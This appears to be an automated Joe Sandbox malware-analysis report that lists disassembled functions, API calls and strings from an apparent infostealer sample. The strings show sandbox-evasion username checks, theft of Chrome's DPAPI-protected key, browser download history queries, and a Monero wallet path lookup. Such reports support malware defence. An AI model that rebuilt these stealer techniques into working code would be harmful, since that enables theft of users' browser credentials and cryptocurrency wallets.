                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Heap$Process$AllocNamestrcmp$ComputerExitUser
                                                                                                                                                                                      • String ID: HAL9TH$JohnDoe
                                                                                                                                                                                      • API String ID: 2098570390-3469431008
                                                                                                                                                                                      • Opcode ID: 93dbde9aba6735ddb8b4640e15453dca2e3bf812afebb5d2a8124f1dc19d439b
                                                                                                                                                                                      • Instruction ID: 58437d2a5f9d451c4f122597da74456d20e768aeb24a9bc98594534105f588cf
                                                                                                                                                                                      • Opcode Fuzzy Hash: 93dbde9aba6735ddb8b4640e15453dca2e3bf812afebb5d2a8124f1dc19d439b
                                                                                                                                                                                      • Instruction Fuzzy Hash: F9D0C966D48F0316BD3B7AB66C0BC0A26DC6A017A6B208916F812DD4A6ED94F6846022
                                                                                                                                                                                      Function 61E4C7C5 Relevance: 8.0, APIs: 4, Strings: 1, Instructions: 467COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: memcmp
                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                      • API String ID: 1475443563-4108050209
                                                                                                                                                                                      • Opcode ID: 5e6f3149d2315a7f97a97c29b0eb816d1210dd2dcce0a1c73a13da43e11864dd
                                                                                                                                                                                      • Instruction ID: 3bb57cbd4086e38ca070a1eb41e2420ec87b0c0feb17810d174f813009c16240
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e6f3149d2315a7f97a97c29b0eb816d1210dd2dcce0a1c73a13da43e11864dd
                                                                                                                                                                                      • Instruction Fuzzy Hash: 66127D70F05255CFEB05CFA8E484789BBF1AF48318F25C1A9D845AB356D774E88ACB80
                                                                                                                                                                                      Function 003478C0 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 236stringCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrlenA.KERNEL32(?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E6EC
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E714
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcpyA.KERNEL32(00000000,?,0035E266,00000000,00361ECC,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6BB
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcatA.KERNEL32(?,?,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6C5
                                                                                                                                                                                        • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00347B02
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00347B16
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrcpy$lstrlen$lstrcat
                                                                                                                                                                                      • String ID: Downloads$SELECT target_path, tab_url from downloads$f5
                                                                                                                                                                                      • API String ID: 2500673778-2057624107
                                                                                                                                                                                      • Opcode ID: 06b4b951b7e1372539f0af0baa09f6e0145ce245e05ac2fbc233195266e32838
                                                                                                                                                                                      • Instruction ID: 83e92827df5fa236e997c97b946db329538b45ab51714390891a456c36f7dac7
                                                                                                                                                                                      • Opcode Fuzzy Hash: 06b4b951b7e1372539f0af0baa09f6e0145ce245e05ac2fbc233195266e32838
                                                                                                                                                                                      • Instruction Fuzzy Hash: E281A772804108AADF06FBE4DD96CEE77B8BE25315F510565F402BE0A1EF24BB09CA61
                                                                                                                                                                                      Function 0034A90D Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 152stringCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0034E5B4: lstrcpyA.KERNEL32(00000000,SJ5,SJ5,?,?,00341334,SJ5,0035E266,00000000,?,00354A53,?), ref: 0034E5DA
                                                                                                                                                                                        • Part of subcall function 003469A2: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00361ECC), ref: 003469C0
                                                                                                                                                                                        • Part of subcall function 003469A2: GetFileSizeEx.KERNEL32(00000000,?), ref: 003469D7
                                                                                                                                                                                        • Part of subcall function 003469A2: LocalAlloc.KERNEL32(00000040,?,?,0035E266), ref: 003469F3
                                                                                                                                                                                        • Part of subcall function 003469A2: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,0035E266), ref: 00346A0D
                                                                                                                                                                                        • Part of subcall function 003469A2: CloseHandle.KERNEL32(?), ref: 00346A2E
                                                                                                                                                                                        • Part of subcall function 0034F884: LocalAlloc.KERNEL32(00000040,0035158E,ERROR,00361C14,?,0035158D,00000000,00000000), ref: 0034F89D
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrlenA.KERNEL32(?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E6EC
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E714
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
                                                                                                                                                                                        • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcpyA.KERNEL32(00000000,?,0035E266,00000000,00361ECC,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6BB
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcatA.KERNEL32(?,?,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6C5
                                                                                                                                                                                      • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00361538,0035E266), ref: 0034A9B0
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0034A9CC
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
                                                                                                                                                                                      • String ID: ^userContextId=4294967295$f5$moz-extension+++
                                                                                                                                                                                      • API String ID: 161838763-3497579655
                                                                                                                                                                                      • Opcode ID: 548af0d37eeae6d458c0462c35f59200353097fc858fe863fa3170162381ec3f
                                                                                                                                                                                      • Instruction ID: 95cc8734dfb5040c1807788d7f03b2db3b1c82b1a6fb30922ac413686bf75f20
                                                                                                                                                                                      • Opcode Fuzzy Hash: 548af0d37eeae6d458c0462c35f59200353097fc858fe863fa3170162381ec3f
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6A510B72900108AADF16FBA4DD52CEE77B8BF55304F850565F802AE191FF24FB09C6A2
                                                                                                                                                                                      Function 003581CA Relevance: 7.6, APIs: 5, Instructions: 107fileCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,0035E266,00000000,00361ECC,?,0035905A,?,?,00355A8E,00000000,?,003590A0,?), ref: 0035821E
                                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,0035E266,00000000,00361ECC,?,0035905A,?,?,00355A8E,00000000), ref: 00358258
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: File$CreatePointer
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2024441833-0
                                                                                                                                                                                      • Opcode ID: e08bc6f64c814ad668a0d1d82f8ea71d16a59fcca2ccdb726ac9ca8b3c1cb05f
                                                                                                                                                                                      • Instruction ID: d3b52857a8d39ddf8301bd09f14c2be0538466e8e9f6a039342cfdf815944785
                                                                                                                                                                                      • Opcode Fuzzy Hash: e08bc6f64c814ad668a0d1d82f8ea71d16a59fcca2ccdb726ac9ca8b3c1cb05f
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0731B3B0500B44DFDB329F25C884E277FA8FB15356F108E2EF996A29A0D7709C88CB55
                                                                                                                                                                                      Function 0034B50C Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 81COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                        • Part of subcall function 003469A2: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00361ECC), ref: 003469C0
                                                                                                                                                                                        • Part of subcall function 003469A2: GetFileSizeEx.KERNEL32(00000000,?), ref: 003469D7
                                                                                                                                                                                        • Part of subcall function 003469A2: LocalAlloc.KERNEL32(00000040,?,?,0035E266), ref: 003469F3
                                                                                                                                                                                        • Part of subcall function 003469A2: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,0035E266), ref: 00346A0D
                                                                                                                                                                                        • Part of subcall function 003469A2: CloseHandle.KERNEL32(?), ref: 00346A2E
                                                                                                                                                                                        • Part of subcall function 0034F884: LocalAlloc.KERNEL32(00000040,0035158E,ERROR,00361C14,?,0035158D,00000000,00000000), ref: 0034F89D
                                                                                                                                                                                      • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0034B556
                                                                                                                                                                                        • Part of subcall function 00346A41: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,=a4,00000000,00000000), ref: 00346A61
                                                                                                                                                                                        • Part of subcall function 00346A41: LocalAlloc.KERNEL32(00000040,=a4,?,?,0034613D,00000000,?,?,?,?,?,?,?,?,00361ECC), ref: 00346A6F
                                                                                                                                                                                        • Part of subcall function 00346A41: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,=a4,00000000,00000000), ref: 00346A85
                                                                                                                                                                                        • Part of subcall function 00346A41: LocalFree.KERNEL32(00000000,?,?,0034613D,00000000,?,?,?,?,?,?,?,?,00361ECC), ref: 00346A94
                                                                                                                                                                                      • memcmp.MSVCRT(?,DPAPI,00000005), ref: 0034B594
                                                                                                                                                                                        • Part of subcall function 00346AA4: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00346AC7
                                                                                                                                                                                        • Part of subcall function 00346AA4: LocalAlloc.KERNEL32(00000040,?,?), ref: 00346ADF
                                                                                                                                                                                        • Part of subcall function 00346AA4: LocalFree.KERNEL32(?), ref: 00346AFD
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmp
                                                                                                                                                                                      • String ID: $"encrypted_key":"$DPAPI
                                                                                                                                                                                      • API String ID: 512175977-738592651
                                                                                                                                                                                      • Opcode ID: 69d528b0ad8e17b66b55fe3a28413f1979dbe261290f0e0c23875e05e42b15c7
                                                                                                                                                                                      • Instruction ID: fe68d3d0768d9cee9e4879fe2031fb1052508e055eda694364418765ea3f2261
                                                                                                                                                                                      • Opcode Fuzzy Hash: 69d528b0ad8e17b66b55fe3a28413f1979dbe261290f0e0c23875e05e42b15c7
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9C2150B6D001087BDF16ABA5DC069EEB7BC9F41350F0581A1F901E9182FB31EB14C661
                                                                                                                                                                                      Function 003412A0 Relevance: 7.5, APIs: 5, Instructions: 35registrymemoryCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00341C8F,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000,000003E8,?), ref: 003412B4
                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,00341C8F,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000,000003E8,?), ref: 003412BB
                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(?,?,00000000,00020119,?,?,?,?,00341C8F,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000,000003E8,?), ref: 003412D4
                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,?,00341C8F,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000,000003E8), ref: 003412ED
                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,00341C8F,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000,000003E8,?), ref: 003412F6
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3466090806-0
                                                                                                                                                                                      • Opcode ID: 95d99a945a9c568da400a4f58ba531460609eb6a1d95f4324b9b089a8b84f265
                                                                                                                                                                                      • Instruction ID: 4bfb9bd2c0d86fbf16f6f9d5b5b260b7991dff723d7bda66e3fa98139f45be59
                                                                                                                                                                                      • Opcode Fuzzy Hash: 95d99a945a9c568da400a4f58ba531460609eb6a1d95f4324b9b089a8b84f265
                                                                                                                                                                                      • Instruction Fuzzy Hash: B1F03AB9640208BFEB119FD1DC0AFAE7B79FB84745F108024F606E91A0D7B19A919B60
                                                                                                                                                                                      Function 0034E9E9 Relevance: 7.5, APIs: 5, Instructions: 35registrymemoryCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,00361678,?,?,?,00352F7B,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,00361678), ref: 0034E9FD
                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,00352F7B,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,00361678,00000000,?), ref: 0034EA04
                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,?,?,?,?,00352F7B,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?), ref: 0034EA22
                                                                                                                                                                                      • RegQueryValueExA.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,00352F7B,00000000,?,Processor: ,00000000,?,[Hardware],00000000), ref: 0034EA3E
